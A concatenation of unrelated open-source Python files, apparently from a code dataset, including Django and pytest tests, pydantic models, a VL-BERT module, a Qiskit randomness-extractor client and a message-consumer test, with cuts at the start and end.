NetCDFLogicalFile.objects.count() == 1 nc_aggr = NetCDFLogicalFile.objects.first() # netcdf aggr should have temporal coverage assert nc_aggr.metadata.temporal_coverage is not None # model aggr should now have temporal coverage assert mi_aggr.metadata.temporal_coverage is not None # temporal coverage of the model instance aggregation should match with that of the contained # netcdf aggregation for temp_date in ('start', 'end'): assert mi_aggr.metadata.temporal_coverage.value[temp_date] == \ nc_aggr.metadata.temporal_coverage.value[temp_date] assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_no_auto_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods): """Here we are testing model instance level temporal coverage auto update does not happen when a contained aggregation temporal coverage gets created as part of that aggregation creation since the model instance aggregation has temporal coverage prior to the child aggregation creation """ resource, user = composite_resource_with_mi_aggregation_folder assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # model aggr should not have any temporal coverage assert mi_aggr.metadata.temporal_coverage is None # create temporal coverage for model instance value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'} mi_aggr.metadata.create_element('coverage', type='period', value=value_dict) # model aggr should now have temporal coverage assert mi_aggr.metadata.temporal_coverage is not None # auto create a netcdf aggregation inside the model instance aggregation assert NetCDFLogicalFile.objects.count() == 0 # upload a netcdf file to the folder that represents the model instance aggregation nc_file_name = "netcdf_valid.nc" netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name) _add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder) assert NetCDFLogicalFile.objects.count() == 1 nc_aggr = NetCDFLogicalFile.objects.first() # netcdf aggr should have temporal coverage assert nc_aggr.metadata.temporal_coverage is not None # temporal coverage of the model instance aggregation should NOT match with that of the contained # netcdf aggregation for temp_date in ('start', 'end'): assert mi_aggr.metadata.temporal_coverage.value[temp_date] != \ nc_aggr.metadata.temporal_coverage.value[temp_date] assert not resource.dangling_aggregations_exist() @pytest.mark.django_db(transaction=True) def test_update_temporal_coverage_from_children(composite_resource_with_mi_aggregation_folder, mock_irods): """Here we are testing model instance level temporal coverage can be updated by user if the contained aggregations have temporal coverage """ resource, user = composite_resource_with_mi_aggregation_folder assert ModelInstanceLogicalFile.objects.count() == 1 mi_aggr = ModelInstanceLogicalFile.objects.first() # model aggr should not have any temporal coverage assert mi_aggr.metadata.temporal_coverage is None # create temporal coverage for model instance value_dict = {'name': 'Name for period coverage', 'start': '1/1/2018', 'end': '12/12/2018'} mi_aggr.metadata.create_element('coverage', type='period', value=value_dict) # model aggr should now have temporal coverage assert mi_aggr.metadata.temporal_coverage is not None # auto create a netcdf aggregation inside the model instance aggregation assert NetCDFLogicalFile.objects.count() == 0 # upload a netcdf file to the folder that represents the model instance aggregation nc_file_name = "netcdf_valid.nc" netcdf_file_path = "hs_file_types/tests/{}".format(nc_file_name) _add_files_to_resource(resource=resource, files_to_add=[netcdf_file_path], upload_folder=mi_aggr.folder) assert NetCDFLogicalFile.objects.count() == 1 nc_aggr = NetCDFLogicalFile.objects.first() # netcdf aggr should have temporal coverage assert nc_aggr.metadata.temporal_coverage is not None # temporal coverage of the model instance aggregation should NOT match with that of the contained # netcdf aggregation for temp_date in ('start', 'end'): assert mi_aggr.metadata.temporal_coverage.value[temp_date] != \ nc_aggr.metadata.temporal_coverage.value[temp_date] # update temporal coverage for model instance from contained aggregations mi_aggr.update_temporal_coverage() # temporal coverage of the model instance aggregation should now match with that of the contained # netcdf aggregation for temp_date in ('start', 'end'): assert mi_aggr.metadata.temporal_coverage.value[temp_date] == \ nc_aggr.metadata.temporal_coverage.value[temp_date] assert not resource.dangling_aggregations_exist() def _add_files_to_resource(resource, files_to_add, upload_folder=None): files_to_upload = [] for fl in files_to_add: file_to_upload = UploadedFile(file=open(fl, 'rb'), name=os.path.basename(fl)) files_to_upload.append(file_to_upload) added_resource_files = add_resource_files(resource.short_id, *files_to_upload, folder=upload_folder) return added_resource_files
tests/data/expected/parser/openapi/openapi_parser_parse_duplicate_models/output.py
stevesimmons/datamodel-code-generator
891
12729266
from __future__ import annotations from typing import List, Optional from pydantic import BaseModel class Pet(BaseModel): id: int name: str tag: Optional[str] = None class Pets(BaseModel): __root__: List[Pet] class Error(BaseModel): code: int message: str class Event(BaseModel): name: Optional[str] = None class Result(BaseModel): event: Optional[Event] = None class Events(BaseModel): __root__: List[Event] class EventRoot(BaseModel): __root__: Event class EventObject(BaseModel): event: Optional[Event] = None class DuplicateObject1(BaseModel): event: Optional[List[Event]] = None class Event1(BaseModel): event: Optional[Event] = None class DuplicateObject2(BaseModel): event: Optional[Event1] = None class DuplicateObject3(BaseModel): __root__: Event
bcs-ui/backend/container_service/projects/constants.py
laodiu/bk-bcs
599
12729326
# -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community Edition) available. Copyright (C) 2017-2021 THL A29 Limited, a Tencent company. All rights reserved. Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://opensource.org/licenses/MIT Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from enum import Enum from django.utils.translation import ugettext_lazy as _ from backend.utils.basic import ChoicesEnum # 管理员标示 SUPER_ROLE = 'manager' class Policy(Enum): # 项目管理 PROJECT = 'modify:project:btn' # 集群管理 CLUSTER = 'cluster:menu' # 节点管理 NODE = 'node:menu' # 应用管理 APP = 'app:menu' # 配置管理 CONFIGURATION = 'configuration:menu' # 网络管理 NETWORK = 'network:menu' # 资源管理 RESOURCE = 'resource:menu' # 仓库管理 REPO = 'repo:menu' # 仓库按钮 REPO_MODIFY = 'modify:repo:btn' class PolicyEffect(Enum): # 正常 NORMAL = 0 # 隐藏 HIDDEN = 1 # 按钮置灰 DISABLED = 2 PolicyLabelOrdering = [_("容器服务"), _("仓库管理"), _("项目管理")] PolicyOrdering = { 'jfrog': [_("prod环境拉取"), _("prod环境推送"), _("test环境拉取"), _("test环境推送"), _("dev环境拉取"), _("dev环境推送")], 'paas_backend': [_("集群管理"), _("节点管理"), _("应用管理"), _("网络管理"), _("仓库管理"), _("资源管理")], 'apigw': [], } class StaffInfoStatus(ChoicesEnum): # 审批中,默认 NORMAL = 0 INCUMBENCY = 1 RESIGN = 2 TRIAL = 3 WAITING_ENTRY = 8 NOT_ENTRY = 9 _choices_labels = ( (NORMAL, _("正常")), (INCUMBENCY, _("在职")), # 现在都返回显示正常 (RESIGN, _("已离职")), (TRIAL, _("试用")), (WAITING_ENTRY, _("待入职")), (NOT_ENTRY, _("待入职")), )
pretrain/modules/resnet_vlbert_for_attention_vis.py
xiling42/VL-BERT
671
12729339
<reponame>xiling42/VL-BERT<gh_stars>100-1000 import os import torch import torch.nn as nn import torch.nn.functional as F from external.pytorch_pretrained_bert import BertTokenizer from common.module import Module from common.fast_rcnn import FastRCNN from common.visual_linguistic_bert import VisualLinguisticBert from common.utils.misc import soft_cross_entropy BERT_WEIGHTS_NAME = 'pytorch_model.bin' class ResNetVLBERTForAttentionVis(Module): def __init__(self, config): super(ResNetVLBERTForAttentionVis, self).__init__(config) self.image_feature_extractor = FastRCNN(config, average_pool=True, final_dim=config.NETWORK.IMAGE_FINAL_DIM, enable_cnn_reg_loss=False) self.object_linguistic_embeddings = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size) if config.NETWORK.IMAGE_FEAT_PRECOMPUTED or (not config.NETWORK.MASK_RAW_PIXELS): self.object_mask_visual_embedding = nn.Embedding(1, 2048) if config.NETWORK.WITH_MVRC_LOSS: self.object_mask_word_embedding = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size) self.aux_text_visual_embedding = nn.Embedding(1, config.NETWORK.VLBERT.hidden_size) self.image_feature_bn_eval = config.NETWORK.IMAGE_FROZEN_BN self.tokenizer = BertTokenizer.from_pretrained(config.NETWORK.BERT_MODEL_NAME) language_pretrained_model_path = None if config.NETWORK.BERT_PRETRAINED != '': language_pretrained_model_path = '{}-{:04d}.model'.format(config.NETWORK.BERT_PRETRAINED, config.NETWORK.BERT_PRETRAINED_EPOCH) elif os.path.isdir(config.NETWORK.BERT_MODEL_NAME): weight_path = os.path.join(config.NETWORK.BERT_MODEL_NAME, BERT_WEIGHTS_NAME) if os.path.isfile(weight_path): language_pretrained_model_path = weight_path if language_pretrained_model_path is None: print("Warning: no pretrained language model found, training from scratch!!!") self.vlbert = VisualLinguisticBert( config.NETWORK.VLBERT, language_pretrained_model_path=None if config.NETWORK.VLBERT.from_scratch else language_pretrained_model_path ) # init weights self.init_weight() self.fix_params() def init_weight(self): if self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED or (not self.config.NETWORK.MASK_RAW_PIXELS): self.object_mask_visual_embedding.weight.data.fill_(0.0) if self.config.NETWORK.WITH_MVRC_LOSS: self.object_mask_word_embedding.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range) self.aux_text_visual_embedding.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range) self.image_feature_extractor.init_weight() if self.object_linguistic_embeddings is not None: self.object_linguistic_embeddings.weight.data.normal_(mean=0.0, std=self.config.NETWORK.VLBERT.initializer_range) def train(self, mode=True): super(ResNetVLBERTForAttentionVis, self).train(mode) # turn some frozen layers to eval mode if self.image_feature_bn_eval: self.image_feature_extractor.bn_eval() def fix_params(self): pass def _collect_obj_reps(self, span_tags, object_reps): """ Collect span-level object representations :param span_tags: [batch_size, ..leading_dims.., L] :param object_reps: [batch_size, max_num_objs_per_batch, obj_dim] :return: """ span_tags_fixed = torch.clamp(span_tags, min=0) # In case there were masked values here row_id = span_tags_fixed.new_zeros(span_tags_fixed.shape) row_id_broadcaster = torch.arange(0, row_id.shape[0], step=1, device=row_id.device)[:, None] # Add extra diminsions to the row broadcaster so it matches row_id leading_dims = len(span_tags.shape) - 2 for i in range(leading_dims): row_id_broadcaster = row_id_broadcaster[..., None] row_id += row_id_broadcaster return object_reps[row_id.view(-1), span_tags_fixed.view(-1)].view(*span_tags_fixed.shape, -1) def forward(self, image, boxes, im_info, text, relationship_label, mlm_labels, mvrc_ops, mvrc_labels, *aux): # concat aux texts from different dataset # assert len(aux) > 0 and len(aux) % 2 == 0 aux_text_list = aux[0::2] aux_text_mlm_labels_list = aux[1::2] num_aux_text = sum([_text.shape[0] for _text in aux_text_list]) max_aux_text_len = max([_text.shape[1] for _text in aux_text_list]) if len(aux_text_list) > 0 else 0 aux_text = text.new_zeros((num_aux_text, max_aux_text_len)) aux_text_mlm_labels = mlm_labels.new_zeros((num_aux_text, max_aux_text_len)).fill_(-1) _cur = 0 for _text, _mlm_labels in zip(aux_text_list, aux_text_mlm_labels_list): _num = _text.shape[0] aux_text[_cur:(_cur + _num), :_text.shape[1]] = _text aux_text_mlm_labels[_cur:(_cur + _num), :_text.shape[1]] = _mlm_labels _cur += _num ########################################### # visual feature extraction images = image box_mask = (boxes[:, :, 0] > -1.5) origin_len = boxes.shape[1] max_len = int(box_mask.sum(1).max().item()) box_mask = box_mask[:, :max_len] boxes = boxes[:, :max_len] mvrc_ops = mvrc_ops[:, :max_len] mvrc_labels = mvrc_labels[:, :max_len] if self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED: box_features = boxes[:, :, 4:] box_features[mvrc_ops == 1] = self.object_mask_visual_embedding.weight[0] boxes[:, :, 4:] = box_features obj_reps = self.image_feature_extractor(images=images, boxes=boxes, box_mask=box_mask, im_info=im_info, classes=None, segms=None, mvrc_ops=mvrc_ops, mask_visual_embed=self.object_mask_visual_embedding.weight[0] if (not self.config.NETWORK.IMAGE_FEAT_PRECOMPUTED) and (not self.config.NETWORK.MASK_RAW_PIXELS) else None) ############################################ # prepare text text_input_ids = text text_tags = text.new_zeros(text.shape) text_visual_embeddings = self._collect_obj_reps(text_tags, obj_reps['obj_reps']) object_linguistic_embeddings = self.object_linguistic_embeddings( boxes.new_zeros((boxes.shape[0], boxes.shape[1])).long() ) if self.config.NETWORK.WITH_MVRC_LOSS: object_linguistic_embeddings[mvrc_ops == 1] = self.object_mask_word_embedding.weight[0] object_vl_embeddings = torch.cat((obj_reps['obj_reps'], object_linguistic_embeddings), -1) # add auxiliary text max_text_len = max(text_input_ids.shape[1], aux_text.shape[1]) text_input_ids_multi = text_input_ids.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], max_text_len)) text_input_ids_multi[:text_input_ids.shape[0], :text_input_ids.shape[1]] = text_input_ids text_input_ids_multi[text_input_ids.shape[0]:, :aux_text.shape[1]] = aux_text text_token_type_ids_multi = text_input_ids_multi.new_zeros(text_input_ids_multi.shape) text_mask_multi = (text_input_ids_multi > 0) text_visual_embeddings_multi = text_visual_embeddings.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], max_text_len, text_visual_embeddings.shape[-1])) text_visual_embeddings_multi[:text_visual_embeddings.shape[0], :text_visual_embeddings.shape[1]] \ = text_visual_embeddings text_visual_embeddings_multi[text_visual_embeddings.shape[0]:] = self.aux_text_visual_embedding.weight[0] object_vl_embeddings_multi = object_vl_embeddings.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], *object_vl_embeddings.shape[1:])) object_vl_embeddings_multi[:object_vl_embeddings.shape[0]] = object_vl_embeddings box_mask_multi = box_mask.new_zeros((text_input_ids.shape[0] + aux_text.shape[0], *box_mask.shape[1:])) box_mask_multi[:box_mask.shape[0]] = box_mask ########################################### # Visual Linguistic BERT encoder_layers, _, attention_probs = self.vlbert(text_input_ids_multi, text_token_type_ids_multi, text_visual_embeddings_multi, text_mask_multi, object_vl_embeddings_multi, box_mask_multi, output_all_encoded_layers=True, output_attention_probs=True) hidden_states = torch.stack(encoder_layers, dim=0).transpose(0, 1).contiguous() attention_probs = torch.stack(attention_probs, dim=0).transpose(0, 1).contiguous() return {'attention_probs': attention_probs, 'hidden_states': hidden_states}
sqlite3__examples/append_image/main.py
DazEB2/SimplePyScripts
117
12729340
<gh_stars>100-1000 #!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' import sys import sqlite3 from PyQt5.QtWidgets import * from PyQt5.QtGui import * if __name__ == '__main__': con = sqlite3.connect('test.sqlite') cur = con.cursor() cur.execute(''' CREATE TABLE IF NOT EXISTS Images ( Data BLOB ) ''') con.commit() with open('capture.png', mode='rb') as f: binary = sqlite3.Binary(f.read()) cur.execute("INSERT INTO Images(Data) VALUES (?)", (binary,)) con.commit() app = QApplication([]) w = QWidget() layout = QVBoxLayout() w.setLayout(layout) for (img_data,) in con.execute("SELECT Data from Images"): pixmap = QPixmap() pixmap.loadFromData(img_data) label = QLabel() label.setPixmap(pixmap) layout.addWidget(label) w.show() sys.exit(app.exec_())
src/pipelinex/extras/ops/ignite/metrics/utils.py
MarchRaBBiT/pipelinex
188
12729409
<gh_stars>100-1000 import torch from ignite.utils import to_onehot class ClassificationOutputTransform: def __init__(self, num_classes=None): self._num_classes = num_classes def __call__(self, output): if isinstance(output, tuple): y_pred, y = output elif isinstance(output, dict): y_pred = output["y_pred"] y = output["y"] else: raise ValueError if self._num_classes: y_pred = y_pred.clamp(min=0, max=self._num_classes - 1).long() y = y.clamp(min=0, max=self._num_classes - 1).long() y_pred = to_onehot(y_pred, self._num_classes) else: y_pred = y_pred.long() y = y.long() return y_pred, y
qiskit/providers/ibmq/random/cqcextractor.py
dowem/qiskit-ibmq-provider
199
12729412
# This code is part of Qiskit. # # (C) Copyright IBM 2020. # # This code is licensed under the Apache License, Version 2.0. You may # obtain a copy of this license in the LICENSE.txt file in the root directory # of this source tree or at http://www.apache.org/licenses/LICENSE-2.0. # # Any modifications or derivative works of this code must retain this # copyright notice, and modified files need to carry a notice indicating # that they have been altered from the originals. """Module for interfacing with a remote extractor.""" import logging from typing import Optional, Callable, List import numpy as np from .utils import generate_wsr, bitarray_to_bytes from .baserandomservice import BaseRandomService from .cqcextractorjob import CQCExtractorJob logger = logging.getLogger(__name__) class CQCExtractor(BaseRandomService): """Class for interfacing with a CQC remote extractor. There are two extractor methods - Dodis (extractor 1) and Hayashi (extractor 2). These methods can be invoked synchronously or asynchronously. To invoke them synchronously:: random_bits = extractor.run(*cqc_parameters) To invoke them asynchronously:: import numpy as np extractor1_out = extractor.run_async_ext1(*ext1_parameters).block_until_ready() extractor2_out = extractor.run_async_ext2( ext2_seed=extractor1_out, *ext2_parameters).block_until_ready() random_bits = np.append(extractor1_out, extractor2_out) Running them asynchronously takes more steps because extractor 2 uses the output of extractor 1 as its seed, so it must wait for extractor 1 to finish first. """ def run( # type: ignore[override] self, ext1_input_num_bits: int, ext1_output_num_bits: int, ext1_raw_bytes: bytes, ext1_wsr_bytes: bytes, ext2_seed_num_bits: int, ext2_wsr_multiplier: int, ext2_wsr_generator: Optional[Callable] = None ) -> List[int]: """Process input data synchronously. Args: ext1_input_num_bits: Number of input bits, for extractor 1. ext1_output_num_bits: Number of output bits, for extractor 1. ext1_raw_bytes: Initial random numbers, in bytes, for extractor 1. ext1_wsr_bytes: Initial WSRs, in bytes, for extractor 1. ext2_seed_num_bits: Number of bits in the seed, for extractor 2. ext2_wsr_multiplier: WSR multiplier, for extractor 2. The number of bits used by extractor 2 is ext2_seed_num_bits*ext2_wsr_multiplier. ext2_wsr_generator: WSR generator used for extractor 2. It must take the number of bits as the input and a list of random bits (0s and 1s) as the output. If ``None``, :func:``generate_wsr`` is used. Returns: An instance of ``CQCExtractorJob`` which can be used to retrieve the results later. """ # pylint: disable=arguments-differ # Run ext1 output = self.run_async_ext1(ext1_input_num_bits, ext1_output_num_bits, ext1_raw_bytes, ext1_wsr_bytes).block_until_ready() # Run ext2 if requested. if ext2_wsr_multiplier != 0: ext2_out = self.run_async_ext2( output, ext2_seed_num_bits, ext2_wsr_multiplier, ext2_wsr_generator).block_until_ready() output = np.append(output, ext2_out).tolist() return output def run_async_ext1( self, ext1_input_num_bits: int, ext1_output_num_bits: int, ext1_raw_bytes: bytes, ext1_wsr_bytes: bytes ) -> CQCExtractorJob: """Run the first extractor asynchronously. Args: ext1_input_num_bits: Number of input bits, for extractor 1. ext1_output_num_bits: Number of output bits, for extractor 1. ext1_raw_bytes: Initial random numbers, in bytes, for extractor 1. ext1_wsr_bytes: Initial WSRs, in bytes, for extractor 1. Returns: An instance of ``CQCExtractorJob`` which can be used to retrieve the results later. Raises: ValueError: If an invalid argument values are specified. """ if not ext1_input_num_bits or not ext1_output_num_bits: raise ValueError("Invalid input arguments. ext1_input_num_bits and " "ext1_output_num_bits must be non-zero.") logger.info("Starting first extraction.") # Run ext1 ext1_data = {"n": ext1_input_num_bits, "m": ext1_output_num_bits} ext1_files = {"x": ext1_raw_bytes, "y": ext1_wsr_bytes} response = self._client.extract( name='cqc', method='ext1', data=ext1_data, files=ext1_files) parameters = {'ext1_input_num_bits': ext1_input_num_bits, 'ext1_output_num_bits': ext1_output_num_bits, 'ext1_raw_bytes': ext1_raw_bytes, 'ext1_wsr_bytes': ext1_wsr_bytes} return CQCExtractorJob(job_id=response['id'], client=self._client, parameters=parameters) def run_async_ext2( self, ext2_seed: List[int], ext2_seed_num_bits: int, ext2_wsr_multiplier: int, ext2_wsr_generator: Optional[Callable] = None ) -> CQCExtractorJob: """Run the second extractor asynchronously. Args: ext2_seed: Seed used for extractor 2, such as the output of extractor 1. ext2_seed_num_bits: Number of bits in the seed, for extractor 2. ext2_wsr_multiplier: WSR multiplier, for extractor 2. The number of bits used by extractor 2 is ext2_seed_num_bits*ext2_wsr_multiplier. ext2_wsr_generator: WSR generator used for extractor 2. It must take the number of bits as the input and a list of random bits (0s and 1s) as the output. If ``None``, :func:``generate_wsr`` is used. Returns: An instance of ``CQCExtractorJob`` which can be used to retrieve the results later. Raises: ValueError: If an invalid argument values are specified. """ if not ext2_seed_num_bits or not ext2_wsr_multiplier: raise ValueError("Invalid input arguments. ext2_seed_num_bits and " "ext2_wsr_multiplier must be non-zero.") logger.info("Starting second extraction.") ext2_seed = bitarray_to_bytes(ext2_seed[:ext2_seed_num_bits]) # type: ignore[assignment] if ext2_wsr_generator is None: ext2_wsr_generator = generate_wsr ext2_wsr = ext2_wsr_generator(ext2_seed_num_bits*ext2_wsr_multiplier) ext2_wsr = bitarray_to_bytes(ext2_wsr) ext2_data = {"a": ext2_seed_num_bits, "b": ext2_wsr_multiplier} ext2_files = {"r": ext2_seed, "x": ext2_wsr} response = self._client.extract(name='cqc', method='ext2', data=ext2_data, files=ext2_files) parameters = {'ext2_seed_num_bits': ext2_seed_num_bits, 'ext2_wsr_multiplier': ext2_wsr_multiplier, 'ext2_seed_bytes': ext2_seed, 'ext2_wsr': ext2_wsr} return CQCExtractorJob(job_id=response['id'], client=self._client, parameters=parameters) def retrieve_job(self, job_id: str) -> CQCExtractorJob: """Retrieve a previously submitted job. Args: job_id: Job ID. Returns: A ``CQCExtractorJob`` instance. """ return CQCExtractorJob(job_id, self._client) def __repr__(self) -> str: return "<{}('{}') from {}>".format(self.__class__.__name__, self.name, self._provider)
bottery/conf/global_settings.py
romulocollopy/bottery
250
12729531
TEMPLATES = [] PLATFORMS = {} MIDDLEWARES = []
sfm/message_consumer/test_sfm_ui_consumer.py
Xtuden-com/sfm-ui
129
12729556
<gh_stars>100-1000 from django.test import TestCase from ui.models import Harvest, Collection, Group, CollectionSet, Credential, User, Seed, Warc, Export, HarvestStat import json from .sfm_ui_consumer import SfmUiConsumer import iso8601 from mock import patch from datetime import date class ConsumerTest(TestCase): def setUp(self): # Create harvest model object group = Group.objects.create(name="test_group") user = User.objects.create_superuser(username="test_user", email="<EMAIL>", password="<PASSWORD>") user.groups.add(group) collection_set = CollectionSet.objects.create(group=group, name="test_collection_set") credential = Credential.objects.create(user=user, platform="test_platform", token=json.dumps({})) collection = Collection.objects.create(collection_set=collection_set, credential=credential, harvest_type="test_type", name="test_collection", harvest_options=json.dumps({})) stream_collection = Collection.objects.create(collection_set=collection_set, credential=credential, harvest_type=Collection.TWITTER_SAMPLE, name="test_stream_collection", harvest_options=json.dumps({}), is_on=True) self.assertTrue(stream_collection.is_on) Seed.objects.create(collection=collection, uid="131866249@N02", seed_id='1') Seed.objects.create(collection=collection, token="library_of_congress", seed_id='2') historical_collection = collection.history.all()[0] historical_credential = historical_collection.credential.history.all()[0] self.harvest = Harvest.objects.create(harvest_id="test:1", collection=collection, historical_collection=historical_collection, historical_credential=historical_credential) # Creating a second harvest to make sure that harvest stats don't conflict harvest2 = Harvest.objects.create(harvest_id="test:2", collection=collection, historical_collection=historical_collection, historical_credential=historical_credential) historical_stream_collection = stream_collection.history.all()[0] historical_stream_credential = historical_stream_collection.credential.history.all()[0] self.stream_harvest = Harvest.objects.create(harvest_id="test:3", collection=stream_collection, historical_collection=historical_stream_collection, historical_credential=historical_stream_credential) HarvestStat.objects.create(harvest=harvest2, item="photos", count=3, harvest_date=date(2016, 5, 20)) Export.objects.create(export_id="test:2", user=user, export_type="test_type") self.consumer = SfmUiConsumer() def test_harvest_status_on_message(self): self.consumer.routing_key = "harvest.status.test.test_search" self.consumer.message = { "id": "test:1", "status": Harvest.RUNNING, "date_started": "2015-07-28T11:17:36.640044", "infos": [{"code": "test_code_1", "message": "congratulations"}], "warnings": [{"code": "test_code_2", "message": "be careful"}], "errors": [{"code": "test_code_3", "message": "oops"}], "stats": { "2016-05-20": { "photos": 12, }, "2016-05-21": { "photos": 19, }, }, "token_updates": { "1": "j.littman" }, "uids": { "2": "671366249@N03" }, "warcs": { "count": 3, "bytes": 345234242 }, "service": "Twitter Harvester", "host": "f0c3c5ef7031", "instance": "39", } # Trigger on_message self.consumer.on_message() # Check updated harvest model object harvest = Harvest.objects.get(harvest_id="test:1") self.assertEqual(Harvest.RUNNING, harvest.status) self.assertEqual(12, harvest.harvest_stats.get(item="photos", harvest_date=date(2016, 5, 20)).count) self.assertDictEqual({ "1": "j.littman" }, harvest.token_updates) self.assertDictEqual({ "2": "671366249@N03" }, harvest.uids) self.assertEqual(3, harvest.warcs_count) self.assertEqual(345234242, harvest.warcs_bytes) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), harvest.date_started) self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], harvest.infos) self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], harvest.warnings) self.assertListEqual([{"code": "test_code_3", "message": "oops"}], harvest.errors) self.assertEqual("Twitter Harvester", harvest.service) self.assertEqual("f0c3c5ef7031", harvest.host) self.assertEqual("39", harvest.instance) # Check updated seeds seed1 = Seed.objects.get(seed_id="1") self.assertEqual("j.littman", seed1.token) self.assertTrue(seed1.history_note.startswith("Changed token")) seed2 = Seed.objects.get(seed_id="2") self.assertEqual("671366249@N03", seed2.uid) self.assertTrue(seed2.history_note.startswith("Changed uid")) # Now update self.consumer.message = { "id": "test:1", "status": Harvest.SUCCESS, "date_started": "2015-07-28T11:17:36.640044", "date_ended": "2015-07-28T11:17:42.539470", "infos": [{"code": "test_code_1", "message": "congratulations"}], "warnings": [{"code": "test_code_2", "message": "be careful"}], "errors": [{"code": "test_code_3", "message": "oops"}], "stats": { "2016-05-20": { "photos": 12, }, "2016-05-21": { "photos": 24, "users": 1 }, }, "warcs": { "count": 5, "bytes": 645234242 }, "service": "Twitter Harvester", "host": "f0c3c5ef7031", "instance": "39", } # Trigger on_message self.consumer.on_message() # Check updated harvest model object harvest = Harvest.objects.get(harvest_id="test:1") self.assertEqual(Harvest.SUCCESS, harvest.status) self.assertEqual(24, harvest.harvest_stats.get(item="photos", harvest_date=date(2016, 5, 21)).count) self.assertEqual(1, harvest.harvest_stats.get(item="users", harvest_date=date(2016, 5, 21)).count) self.assertEqual(5, harvest.warcs_count) self.assertEqual(645234242, harvest.warcs_bytes) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:36.640044"), harvest.date_started) self.assertEqual(iso8601.parse_date("2015-07-28T11:17:42.539470"), harvest.date_ended) self.assertListEqual([{"code": "test_code_1", "message": "congratulations"}], harvest.infos) self.assertListEqual([{"code": "test_code_2", "message": "be careful"}], harvest.warnings) self.assertListEqual([{"code": "test_code_3", "message": "oops"}], harvest.errors) self.assertEqual("Twitter Harvester", harvest.service) self.assertEqual("f0c3c5ef7031", harvest.host) self.assertEqual("39", harvest.instance) # Now changes harvest options and check that seeds deleted. # "deactivate_not_found_seeds": self.cleaned_data["deleted_accounts_option"], # "deactivate_unauthorized_seeds": self.cleaned_data["protected_accounts_options"], # "deactivate_suspended_seeds": self.cleaned_data["suspended_accounts_option"] collection = Collection.objects.get(name="test_collection") # Make sure both seeds are on. seed_ids = [] for seed in collection.seeds.all(): self.assertTrue(seed.is_active) seed_ids.append(seed.seed_id) collection.harvest_options = json.dumps({ "deactivate_not_found_seeds": True, "deactivate_unauthorized_seeds": False, "deactivate_suspended_seeds": False }) collection.save() self.consumer.message = { "id": "test:1", "status": Harvest.SUCCESS, "date_started": "2015-07-28T11:18:36.640044", "date_ended": "2015-07-28T11:18:42.539470", "warnings": [ {"code": "token_unauthorized", "message": "This token is unauthorized.", "seed_id": seed_ids[0]}, {"code": "token_not_found", "message": "This token is not found.", "seed_id": seed_ids[1]}, ], "service": "Twitter Harvester", "host": "f0c3c5ef7031", "instance": "39", } # Trigger on_message self.consumer.on_message() unauthorized_seed = Seed.objects.get(seed_id=seed_ids[0]) self.assertTrue(unauthorized_seed.is_active) not_found_seed = Seed.objects.get(seed_id=seed_ids[1]) self.assertFalse(not_found_seed.is_active) @patch("message_consumer.sfm_ui_consumer.collection_stop") def test_harvest_status_stream_failed_on_message(self, mock_collection_stop): self.consumer.routing_key = "harvest.status.twitter.twitter_sample" self.consumer.message = { "id": "test:3", "status": Harvest.FAILURE, "date_started": "2015-07-28T11:17:36.640044", "date_ended": "2015-07-28T11:17:42.539470" } # Trigger on_message self.consumer.on_message() # Check updated harvest model object harvest = Harvest.objects.get(harvest_id="test:3") self.assertEqual(Harvest.FAILURE, harvest.status) self.assertFalse(harvest.collection.is_on) mock_collection_stop.assert_called_once_with(harvest.collection.id) @patch("message_consumer.sfm_ui_consumer.collection_stop") def test_rogue_harvest(self, mock_collection_stop): self.consumer.routing_key = "harvest.status.twitter.twitter_sample" self.consumer.message = { "id": "test:3", "status": Harvest.RUNNING, "date_started": "2015-07-28T11:17:36.640044", "date_ended": "2015-07-28T11:17:42.539470" } # Trigger on_message self.consumer.on_message() # Check updated harvest model object harvest = Harvest.objects.get(harvest_id="test:3") self.assertEqual(Harvest.RUNNING, harvest.status) self.assertTrue(harvest.collection.is_on) # Mark the harvest as already being completed. harvest.status = Harvest.SUCCESS harvest.save() # Trigger on_message self.consumer.on_message() mock_collection_stop.assert_called_once_with(harvest.collection.id) def test_on_message_ignores_bad_routing_key(self): self.consumer.routing_key = "xharvest.status.test.test_search" # Trigger on_message and nothing happens self.consumer.on_message() def test_on_message_ignores_unknown_harvest(self): self.consumer.routing_key = "harvest.status.test.test_search" self.consumer.message = { "id": "xtest:1" } # Trigger on_message and nothing happens self.consumer.on_message() def test_warc_created_on_message(self): self.consumer.routing_key = "warc_created" self.consumer.message = { "warc": { "path": "/var/folders/_d/3zzlntjs45nbq1f4dnv48c499mgzyf/T/tmpKwq9NL/test_collection_set/2015/07/28/" "11/" + "test_collection_set-flickr-2015-07-28T11:17:36Z.warc.gz", "sha1": "7512e1c227c29332172118f0b79b2ca75cbe8979", "bytes": 26146, "id": "test_collection-flickr-2015-07-28T11:17:36Z", "date_created": "2015-07-28T11:17:36.640178" }, "collection_set": { "path": <KEY>", "id": "test_collection_set" }, "harvest": { "id": "test:1", } } # Trigger on_message self.consumer.on_message() # Check created Warc 